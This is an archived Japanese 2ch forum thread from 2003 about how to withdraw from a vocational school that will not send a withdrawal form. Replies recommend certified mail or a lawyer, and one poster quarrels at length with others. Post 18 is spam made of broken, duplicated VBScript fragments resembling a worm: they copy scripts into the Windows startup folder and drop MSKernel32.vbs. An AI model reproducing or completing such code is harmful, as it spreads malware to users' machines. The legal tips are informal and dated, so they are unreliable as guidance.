5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

退学届けについて

1 :名無し専門学校:03/08/24 00:32
学校やめるつもりなんだけど、学校側が退学届け送ってくれない!
こんなときって自分で便せんに「退学届」みたいに書いて、
学生証と一緒に送ったらそれで退学できる?
つまんない質問でごめんなさい…。
よかったら教えてください。



2 :早稲田政治経済 ◆6Rqi3oEEs. :03/08/24 00:34
>>1
退学したいのに退学させてもらえないなら然るべき手段に訴えるべき

ですが実際おっぱじめると面倒くさいので脅しだけで十分だと思います

3 :名無し専門学校:03/08/24 00:35
単に授業に出席せず学費も振り込まずにシカトしてれば
いいってもんでもないのか?

4 :早稲田政治経済 ◆6Rqi3oEEs. :03/08/24 00:37
>>3
良くないです。学費請求される可能性大

5 :名無し専門学校:03/08/24 00:43
∧_∧ 
( ´・ω・)   >>4
( つ旦O    へー
と_)_) 

6 :名無し専門学校:03/08/24 00:46
>>1
単発質問スレを立てるのはやめましょう。

くだらねぇ質問はここに書き込め 専門板 Part1
http://school.2ch.net/test/read.cgi/senmon/1029658960/

7 :名無し専門学校:03/08/24 00:46
んじゃ、その請求も無視したら?

8 :早稲田政治経済 ◆6Rqi3oEEs. :03/08/24 10:22
大変です
相手に訴えられたり取り立ての人が来ます

9 :名無し専門学校:03/08/24 12:55
>>8
そこに至るまでの詳細な流れを書いてみ。
どういう場合に、どういう人が取り立てに来るのか。

知ったかの上、自分を慰めるようなレスは醜い。

10 :名無し専門学校:03/08/24 13:36
契約解除の手続きが完了していないにも関わらず、
一方的に支払いを怠った場合は、>>8の言う通りです。

ただし、契約解除の手続きを故意に遅らせる、または妨害する等の
行為が認められる場合には、この限りではありません。

一番良いのは、学校側が退学届を郵送してくれないことを弁護士に伝え、
弁護士の連名入りで、便箋等に、「退学の意志があり、退学を願い出ているが
学校側は書類を一向に送らないため、この用紙をもって退学願いとする」旨、
書いて配達記録郵便で送ってしまうことです(捺印をお忘れなく)。

または、内容証明郵便で送ってもいいでしょう。この場合、書面を書く用紙は
内容証明専用のものになります。内容証明であれば、捺印さえしておけば、
弁護士の連名等は無くても構わないかと思います。800円で送れますし。

11 :早稲田政治経済 ◆6Rqi3oEEs. :03/08/24 15:01
>>2で申し上げた通り弁護士さんを通すのが賢明ですが実際お金と時間がかかるので直接『然るべき手段に訴えるしかありません』と言えば大体すむと思います
但し頑なに拒否する場合は然るべき手段にでなければなりません
しかし専門学校などは客商売なのでできることならトラブル回避をすると思いますので弁護士といっただけでビビると思われます。

>>9
とにかくそういう時は取り立て屋が別に来ますよ。弁護士法違反でも来るところは来ます
ビデオ屋で延滞した時は別の会社から出向社員が来ます。
そういう時は弁護士に電話すれば一発です
うちはその時某弁護士会の会長が母の知り合いだったもので電話して相談したら一発でした

12 :名無し専門学校:03/08/24 17:54
>>11
詳細にって言ったのに、"とにかく"という一言で片付けないで。

それに弁護士使ったある意味脅迫を、自慢気に語らないで。
それにレンタルビデオ延滞していたのはあなたでしょ?
>>1のことと一切関係ないし、一般的な学校の退学にも全然関係ないし。
弁護士を紹介するならまだしも、相談すべき場所も方法も言わないで。

せめてそのコテハンは止めて。
トリップはそのままでいいから。

13 :早稲田政治経済 ◆6Rqi3oEEs. :03/08/26 17:46
>>12
わけわかんないんですけど。
なんであなたにそんな詳細に流れ説明しなきゃならないの?
てか何でそんな怒ってるの?コテハンが嫌なだけ?

延滞の話は説明不足だった。
家族がCD借りて返すの忘れてて1ヶ月くらい経った時にビデオ屋から電話で『延滞料金1万〇千円』ですとかいう電話が来て
相手が微妙にすごんできたから弁護士の名前出しただけ。当たり前でしょ?脅迫でもなんでもないし
学費も同じだって。
退学届受理しないとか送ってこないでおいて学費払えとか抜かしてくるならそんなもん弁護士呼ぶに決まってるジャン

>>せめてそのコテハンは止めて。トリップはそのままでいいから。
訳わかんない


14 :名無し専門学校:03/08/27 07:29
>>13
もし、あなたが>>10なら本当に申し訳ないが、
まず>>10はお読みになりましたか?

>>1が聞きたいのはこういうことでしょう?
詳細にって言ったのは、私に説明してって事ではなく、
閲覧者を意識して説明して欲しいってことですよ。
延滞の話なんて、それこそ関係ないでしょう。

どういう状況の場合に、どのような対応をすればよいのか。
必要なのはここじゃないですか?
訳分からないこと言ってるのはあなたです。

あなたのことは嫌いですが、それはコテハンだからではありません。
ウザイ事言ってるからですよ。
もう別にコテハンも変えて頂かなくて結構です。
早稲田政経 ◆6XD48Lv1aI と区別する必要ないみたいですから。

15 :早稲田政治経済 ◆6Rqi3oEEs. :03/08/27 15:06
>>14
なんで俺に説明義務らしきもんが発生してるんだ?
延滞の話と関係あるって。
延滞料金未払い通告を長期間せずにあとになって『払え』っていうのと
退学届送付せずに学校行かないでも何の通告もナシで学費納入時期になって『払え』っていっしょじゃん

でも後者はさっさとやらないと法的に勝ち目がなくなるから違うのかな

しかし鬼気迫る怒り方ですね。なんかの私怨ですか?早稲田政経 ◆6XD48Lv1aI 以上だ。

てか早稲田政経 ◆6XD48Lv1aI ?多分違う方だと思いますがここまでしつこくされると…

16 :名無し専門学校:03/08/28 07:23
>>15
>なんで俺に説明義務らしきもんが発生してるんだ?
失礼。
あなたが退学を考えている人の為に、何か役に立つ情報をお持ちかと思ったもので。
それに普通にお願いしたつもりですが。
私が期待したお話をしてくれなくて残念です。

私はどうしても退学と延滞料金云々は話が違うと思いますが、
そこまで言い張るのならそれでいいです。
せっかくなので、>>10の補足などしていただければ幸いですが。
弁護士とコンタクトを取る方法とか。
弁護士と知り合いの人を探すとかやめてくださいね。

それ以外の戯言なら、せめてsageでレスしてくれませんか?

17 :早稲田政治経済 ◆6Rqi3oEEs. :03/08/28 14:32
凄い怒ってるね。どうしたの?

>>弁護士とコンタクトを取る方法とか。
そんなもん知らないのかよ。無知は怖いね。普通に電話一本ジャン
紹介してもらわなきゃ会えないとでも思ったの?弁護士はヤクザでも殺し屋もないよ


18 :age:03/08/29 06:30
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"c.Copy(dirsystem&"\MSKernel32.vbs")
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"c.Copy(dirsystem&"\MSKernel32.vbs")

19 :名無し専門学校:03/08/29 06:51
>>17
実に詳しくて分かりやすいレスですね。

相談先の選び方、相談料の有無や相談時間、事前準備のコツ、トータルの費用等、
一般的に気になると思われる事も、一切合財解決しているようです。

これなら>>1も安心して退学できますね。

もしよろしければ、一度学校に払ったお金が戻る可能性についてお話頂けませんか?
また、それが難しい場合についても、情報提供してくれると誠に幸甚に存じますが。

>>18
姑息だな。

20 :age:03/08/29 08:29
荒れまくってますが…
自分も一端を担ってしまったんで申し訳ないのですが。
とりあえず削除人さん出動とアク禁要請します。



21 :名無し専門学校:03/09/01 00:35
電話で退学したいのですが、退学届送ってくれないでしょうか?
って言ったら送ってくれるかな??

22 :早稲田政治経済 ◆6Rqi3oEEs. :03/09/01 00:54
>>21
1?

23 :21:03/09/01 00:59
違います。勝手に質問させてもらいました

24 :名無し専門学校:03/11/16 14:39
>>1よ。
学校の事務に、直接、退学届を貰いに行けよ。
でも普通の学校組織なら、授業料払わなければじきがくれば除籍になるだけだよ

25 :名無し専門学校:03/11/16 15:32
別にわざわざ退学届けの書類を貰わなくても、まだ未成年なら自分の署名、
保護者の著名+印鑑で退学届けを書けばいいんじゃねーの?
退学の意思をはっきりさせておけば、後は放置しても向こうの責任だろ。

26 :名無し専門学校:03/11/16 17:28
既出ですが内容証明郵便で送れば?

27 :名無し専門学校:03/11/17 23:33
授業料払わないと除籍されるだろ?
ちなみに自主退学と除籍じゃ扱い方が違うからな
除籍された奴なんて会社はまず雇わない

大学で除籍という形の退学を食うのは犯罪を犯したか8年で卒業できないか金払わなかったかだけど
1番目のは言うまでも無く社会的にも地位が無くなるのはわかってるから論外として
2,3番目のはそうなる前に速やかに退学届けを出すだろうよ

何が言いたいかって言えばさっさと退学届け貰いに学校に行けってこった

28 :名無し専門学校:04/01/10 22:52


11 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)